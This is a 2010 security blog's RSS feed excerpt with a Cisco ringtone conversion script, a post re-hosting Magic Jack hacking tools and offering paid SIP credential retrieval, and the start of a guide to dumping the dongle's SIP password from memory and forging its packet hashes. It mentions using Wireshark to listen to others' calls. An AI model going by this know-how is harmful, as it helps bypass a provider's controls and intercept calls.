		<link>http://www.digitaloffensive.com/2010/03/create-custom-ringtones-for-cisco-ip-phones/</link>
		<comments>http://www.digitaloffensive.com/2010/03/create-custom-ringtones-for-cisco-ip-phones/#comments</comments>
		<pubDate>Mon, 22 Mar 2010 18:27:56 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=182</guid>
		<description><![CDATA[After months of research of a simple way to create custom ringtones for Cisco IP phones I have come up with the following methods based on the Cisco documentation located at : http://www.cisco.com/en/US/docs/voice_ip_comm/cucm/admin/3_0_9/a3rings.html . Cisco requires that the custom ringtones meet strict guidelines. This baffles me as my cell phone can play full length mp3 [...]]]></description>
			<content:encoded><![CDATA[<p>After months of research of a simple way to create custom ringtones for Cisco IP phones I have come up with the following methods based on the Cisco documentation located at : <a href="http://www.cisco.com/en/US/docs/voice_ip_comm/cucm/admin/3_0_9/a3rings.html" target="_blank">http://www.cisco.com/en/US/docs/voice_ip_comm/cucm/admin/3_0_9/a3rings.html</a> . Cisco requires that the custom ringtones meet strict guidelines. This baffles me as my cell phone can play full length mp3 files as a custom ringtones and costs a fraction of a Cisco IP phone. Oh well I digress. To accomplish this I chose to use the “sox” application. Sox is like a Swiss army knife for sound editing and the best part it is free.</p>
<p>I have created a simple shell script below that will automate the process for you. This script was written to run on the Linux based PBX (Trixbox, PBX in a Flash, Asterisk and so on). Though with a little editing of the script you can use it to just create the ringtones and not install them.</p>
<p><span id="more-182"></span></p>
<ol>
<li>Make sure you have sox installed: which sox and if you don’t you can install it with either apt-get or  yum.</li>
<li>Download the wav files or mp3 that you want to convert to your PBX but. I suggest using Google or another means to find files you want to use. Remember mp3 support may not work.</li>
<li>Copy the code below and paste it into a file on your Linux box using your favorite editor.</li>
<li>Open the shell script and edit the variables if your paths are different. If you don’t know what to put here leave it blank. These are the paths on your PBX where the phone will pull its configurations from.</li>
<li>Save the changes and chmod the file so you can execute it.</li>
<li>Excute the script:</li>
<li>When prompted for the path and name of file you want to convert enter it like this: /music/ring.wav</li>
<li>When prompted for the path and name of the output file it enter it like this: /music/ring (no extension)</li>
<li>Watch for errors and correct where needed.</li>
<li>If you are running this on a Linux PBX it will copy the file to the /tftpboot dir and edit the RINGLIST.DAT file for you.</li>
<li>Once the script is done reboot your phone</li>
</ol>
<p>#!/bin/bash<br />
#####################################<br />
## Create custom cisco ringtones   ##<br />
## Created by Michael LaSalvia     ##<br />
## http://www.digitaloffensive.com ##<br />
## Tested on cisco 7940 and 7960   ##<br />
## Running SIP                       ##<br />
#####################################</p>
<p>#Variables<br />
dtftp=/tftpboot<br />
fring=$dtftp/RINGLIST.DAT</p>
<p>#My current sox install does not support mp3. Most do not by default.<br />
echo &#8220;Enter the path and name of the file you want to convert: &#8221;<br />
read inRing<br />
echo &#8220;Enter the path and name of the output file: &#8221;<br />
read oRing<br />
echo &#8220;#############################################&#8221;<br />
echo &#8220;Converting the file&#8221;<br />
echo &#8220;#############################################&#8221;<br />
#Not all sox installs support -b without a positive integer<br />
sox $inRing -t raw -r 8000 -U -b -c 1 $oRing.raw resample -ql<br />
echo &#8220;#############################################&#8221;<br />
echo &#8220;Resizing the file(16080B) and saving to $dtftp&#8221;<br />
echo &#8220;#############################################&#8221;<br />
dd if=oRing.raw of=$dtftp/$oRing.raw bs=1005 count=16<br />
echo &#8220;#############################################&#8221;<br />
echo &#8220;Editing the RINGLIST&#8221;<br />
echo &#8220;#############################################&#8221;<br />
echo &#8220;$oRing    $oRing.raw&#8221; &gt;&gt; $dtftp/$fring<br />
echo &#8220;#############################################&#8221;<br />
echo &#8220;If there was no errors above, please reset your phone and choose your new ring&#8221;<br />
echo &#8220;#############################################&#8221;</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F03%2Fcreate-custom-ringtones-for-cisco-ip-phones%2F&amp;title=Create%20custom%20ringtones%20for%20Cisco%20IP%20Phones" id="wpa2a_78"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/03/create-custom-ringtones-for-cisco-ip-phones/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Stroths Magic Jack Suite and SipDump.exe</title>
		<link>http://www.digitaloffensive.com/2010/03/stroths-magic-jack-suite-and-sipdump-exe/</link>
		<comments>http://www.digitaloffensive.com/2010/03/stroths-magic-jack-suite-and-sipdump-exe/#comments</comments>
		<pubDate>Thu, 18 Mar 2010 01:22:21 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=172</guid>
		<description><![CDATA[It has come to my attention through several comments and emails that a lot of the links that contain these tools no longer work. So in order to provide them to the masses I have uploaded them to my site. They can be accessed at this link: http://www.digitaloffensive.com/mj/mj.rar If you like your SIP info retrieved [...]]]></description>
			<content:encoded><![CDATA[<p>It has come to my attention through several comments and emails that a lot of the links that contain these tools no longer work. So in order to provide them to the masses I have uploaded them to my site. They can be accessed at this link: <a href="http://www.digitaloffensive.com/mj/mj.rar" target="_blank">http://www.digitaloffensive.com/mj/mj.rar</a></p>
<p>If you like your SIP info retrieved for you, we offer remote retrieval support for $10.00 per Magic Jack:</p>
<p style="text-align: center;"><a href="http://www.digitaloffensive.com/remote.html"><img class="aligncenter size-full wp-image-176" title="btn_buynowCC_LG" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/btn_buynowCC_LG.gif" alt="" width="122" height="47" /></a></p>
<p style="text-align: left;">I have also corrected the download link for the mjproxy source code in my article: <a href="http://www.digitaloffensive.com/mjproxy.c.tar.gz" target="_blank">http://www.digitaloffensive.com/mjproxy.c.tar.gz</a></p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F03%2Fstroths-magic-jack-suite-and-sipdump-exe%2F&amp;title=Stroths%20Magic%20Jack%20Suite%20and%20SipDump.exe" id="wpa2a_80"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/03/stroths-magic-jack-suite-and-sipdump-exe/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Hacking the Magic Jack in 2010 for use on Trixbox or any other SIP device</title>
		<link>http://www.digitaloffensive.com/2010/03/hacking-the-magic-jack-in-2010-for-use-on-trixbox-or-any-other-sip-device/</link>
		<comments>http://www.digitaloffensive.com/2010/03/hacking-the-magic-jack-in-2010-for-use-on-trixbox-or-any-other-sip-device/#comments</comments>
		<pubDate>Thu, 11 Mar 2010 19:56:31 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=121</guid>
		<description><![CDATA[Hacking the Magic Jack in 2010 for use on Trixbox or any other SIP device The concept and art of hacking the Magic Jack is actually really old. The reason I am writing this is that over the last year the process has become much harder. There is definitely ample information available online that if [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><strong><span style="text-decoration: underline;">Hacking the Magic Jack in 2010 for use on Trixbox or any other SIP device</span></strong></p>
<p>The concept and art of hacking the Magic Jack is actually really old. The reason I am writing this is that over the last year the process has become much harder. There is definitely ample information available online that if you were to spend weeks reading you could easily do this. But who wants to read through countless forums post trying each way to hack it only to find that way no longer works. Like you, I want the answer and I want it now.</p>
<p><strong><span style="text-decoration: underline;">Chapters:</span></strong></p>
<ol>
<li>Who wrote this document.</li>
<li>What is the Magic Jack.</li>
<li>Why did I buy it and my buying experience.</li>
<li>Required tools and knowledge.</li>
<li>Setup and registration of your Magic Jack.</li>
<li>Get SIP info and Proxy info.</li>
<li>Testing settings and using other SIP clients.</li>
<li>Configuring Trixbox</li>
</ol>
<p><span id="more-121"></span></p>
<p><strong><span style="text-decoration: underline;">Who wrote this:</span></strong></p>
<p>This document contains the ideas of many but has been written, tested, added to and compiled into one body of knowledge by the team of Security professionals at <a href="../">http://www.digitaloffensive.com</a>. Resale, trading, or hosting of this document is against the law and violators will be prosecuted. This document is for educational use only and the team at <a href="../">http://www.digitaloffensive.com</a> does not take any responsibility for your use of this document or the effects it may have on your systems or Magic Jack account.</p>
<p><strong><span style="text-decoration: underline;">What is the Magic Jack:</span></strong></p>
<p>The Magic Jack is a small USB dongle that plugs into a computer and telephone to provide the end user a low cost phone service through the power of VoIP and ads. There are many thoughts on this product some good and many bad. Many people believe this product to be riddled with spyware based on their poorly worded TOS that you must accept to use and the ads you are forced to see when using their soft phone. I am under the assumption that anything I install on my computer could possibly spy on me and I assume that risk. With that out of the way I leave it up to you to decide if you want to try this product or not.</p>
<p><strong><span style="text-decoration: underline;">Why did I buy it and my buying experience:</span></strong></p>
<p>Several days ago I ordered a Magic Jack. My reason for ordering a Magic Jack was to use it as a part of my Trixbox VoIP system. I read this can be done and it looked real easy to do. Lucky for me they were offering a free 30 day trial. The free 30 day trial is actually free though they put a hold on your credit card for 46.00 + change this includes the shipping cost, the USB dongle and 1 year of service. The whole process felt fishy to me but I figured even if I was to get ripped off it was under $50.00 and would provide a good learning experience as well as give me something to write about. It took less than 5 days to get my Magic Jack sent to me.</p>
<p>During the research I did I found that the older versions of the Magic Jacks before the recent upgrades were easier to hack and to get the SIP information off of. So when I ordered this I was hoping that it would arrive in one of those vacuum packed plastic cases that take close to an act of God to open. My thought process was that if it came sealed like that it might have been sitting on the shelf for some time and not contain the most recent updates, making it easier to hack. But no, mine came in a foam holder like a glorified AOL DVD. I decided to first try to install it on a computer with no internet connection so I can view the files on the Magic Jack and maybe figure a way to disable the auto updates. This was fruitless because as soon as it detected there was no internet it would not install. So I moved the USB to another computer with internet access and enabled windows firewall in hopes that it would stop the Magic Jack from auto running and updating itself. I was wrong. It ran and automatically updated itself to version 2/18/10. I was about to ship it back ASAP, but I got to say this little device looks cool and I wanted to play.</p>
<p><strong><span style="text-decoration: underline;">Required Tools and Knowledge:</span></strong></p>
<p>We will need to download several tools to get started. I suggest that you create a folder on your desktop and extract all the files to the folder you created as they all will be used together.</p>
<ol>
<li><strong>Magic Jack:</strong> <a href="http://www.magicjack.com/">http://www.magicjack.com</a>.</li>
<li><strong>Stroths MJ Utilities Suite v 1.6 from this link: </strong><a href="http://magicjackhacks.com/downloads/MagicJack_Utilitieswsip.zip">http://magicjackhacks.com/downloads/MagicJack_Utilitieswsip.zip</a> . This suite was once used to be able to pull the SIP information off your Magic Jack. Even though this feature no longer works with newer Magic Jacks, this suite provides other useful tools that we will need.</li>
<li><strong>SIPDump.exe:</strong> This file is not normally included in the suite above, but the URL above has a copy of it in the zip file. The Magic Jack stores the SIP info in memory. This is the most important tool and will be used to dump the password and SIP info out of memory.</li>
<li><strong>MJMD5: </strong><a href="http://magicjackhacks.com/downloads/MJMD5.exe">http://magicjackhacks.com/downloads/MJMD5.exe</a> . This is a windows proxy that will allow us to use other thin clients and soft phones, such as xlite, without needing the actual USB dongle. This is also good for those that want to use the iphone or other wifi enabled phones. This is needed since Magic Jack has altered how it handles SIP and basically adds a hash to each packet. This tool will add the hash and the proper syntax information. I use this tool to test my Magic Jacks to make sure that the SIP information I pulled off is correct.</li>
<li><strong>WireShark</strong>: <a href="http://www.wireshark.org/download.html">http://www.wireshark.org/download.html</a> . WireShark is a packet sniffer and will be useful in figuring out what Magic Jack proxy we are using. It is also capable of capturing VoIP calls and compiling them so you can listen to other people’s calls.</li>
<li><strong>Notepad ++</strong>: <a href="http://sourceforge.net/projects/notepad-plus/files/">http://sourceforge.net/projects/notepad-plus/files/</a>. Notepad ++ is a replacement for Notepad. It keeps the formatting of files, adds line number, and is able to open large files without crashing and many other cool features. This will be needed to open the memory dump files. Though it is possible to use Notepad or Wordpad to do the same on faster computers.</li>
<li><strong>Xlite: </strong><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:DontVertAlignCellWithSp /> <w:DontBreakConstrainedForcedTables /> <w:DontVertAlignInTxbx /> <w:Word11KerningPairs /> <w:CachedColBalance /> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--><!--  /* Font Definitions */  @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:roman; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1107304683 0 0 159 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1073750139 0 0 159 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	